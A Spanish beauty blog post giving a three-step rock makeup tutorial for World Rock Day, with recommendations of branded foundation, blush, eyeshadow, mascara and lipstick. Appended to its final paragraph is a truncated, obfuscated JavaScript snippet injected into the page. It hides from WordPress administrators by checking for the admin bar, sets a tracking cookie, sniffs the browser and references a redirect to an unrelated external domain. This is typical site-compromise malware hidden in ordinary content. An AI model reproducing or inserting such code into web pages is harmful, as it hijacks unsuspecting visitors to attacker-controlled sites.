Hoy, 13 de julio, no es un sábado cualquiera es ¡el Día Mundial del Rock! Y queremos celebrar nuestra pasión por la música con vosotras y vosotros compartiendo un tutorial rápido y sencillo para conseguir un maquillaje rock auténtico. Es hora de darle al play de nuestra playlist de rock favorita, ponernos frente al espejo y sacar nuestro lado más atrevido con un look marcado, oscuro, metalizado y más sorprendente que nunca. ¿Te atreves?

Chica de color mira a camara lleva un maquilaje muy rockero con ojos negros y uñas pintadas tambien en negro

Maquillaje rock perfecto paso 1: rostro sobrio, pero muy marcado

Para conseguir un maquillaje estilo rockero en unos sencillos pasos deberemos buscar la intensidad en todo momento. Aunque la pieza central de este look son los ojos, empezaremos aplicando una base de maquillaje de larga duración que sea ligera y natural. Hay quien prefiere utilizar uno o dos tonos por encima del de nuestra piel, pero nosotras recomendamos apostar por la naturalidad ante todo y la Double Wear Stay-in-Place Spg10 de Estée Lauder es una opción perfecta ya que se mantiene intacta por mucho que suban las temperaturas o bailemos toda la noche.

Para terminar con el rostro elegiremos un colorete que nos permita marcar mucho los pómulos como JOUES CONTRASTE de CHANEL. La idea es conseguir con un solo producto dar mayor estructura al rostro y ser el punto de luz que contraste con la fuerza oscura e intimidante de la mirada.

Maquillaje rock perfecto paso 2: smokey eye para potenciar la mirada

Los grandes protagonistas de este maquillaje rockero para celebrar el Día Mundial del Rock son nuestros ojos. No os compliquéis mucho y haceros con una paleta de sombras que contenga los colores básicos – negro oscuro, gris y plata – para conseguir un efecto Smokey Eye como la 3 COULEURS TRI(O)BLIQUE- EDICIÓN LIMITADA DE DIOR. Empieza aplicando la sombra más plateada alrededor del lagrimal, a continuación, subiremos progresivamente el tono y la intensidad cuanto más cerca del final del ojo estemos. Nuestro truco para intensificar aún más el efecto consiste en aplicar un poco de sombra negra en la zona de las pestañas inferiores.

El único problema de este look es que puede hacer los ojos más pequeños, si es vuestro caso, bajaremos la intensidad del Smokey Eye o nos decantaros por un Cat eye muy marcado.

Terminaremos el maquillaje de nuestros ojos aplicando una máscara de pestañas que exagere su longitud y densidad como solo puede conseguirlo uno de nuestros productos predilectos, ControlledChaos MascaraInk de Shiseido. Sin exagerar, esta máscara se merece una canción de rock para ella sola.

chica joven con la tez muy blanca mira a camara con la cabeza girada lleva un maquillaje de ojos muy marcado con un estilo rock & roll

Maquillaje rock perfecto paso 3: el protagonismo que merecen tus labios

Un buen labial oscuro será el broche perfecto para lograr un total look rockero lo más auténtico posible. Los tonos morados o burdeos son los más adecuados para dar a tus labios el protagonismo que se merecen. Si, por el contrario, al mirarnos en el espejo decidimos que no hace falta un solo de labios y que nuestros ojos han cargado lo suficiente la melodía, buscaremos un labial nude que pase desapercibido. Al igual que con el Rock & Roll este look no admite medias tintas: ¡o todo o nada!

la boca entreabierta de una chica joven que lleva los labios pintados en color burdeos oscuro tambien vemos el pinta labios del mismo color

Esperamos que con estos sencillos pasos consigas un maquillaje rock perfecto para salir a bailar las canciones más irreverentes y divertidas acompañadas por una actitud rebelde y sin complejos. ¡Larga vida al Rock & Roll y hasta pronto! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone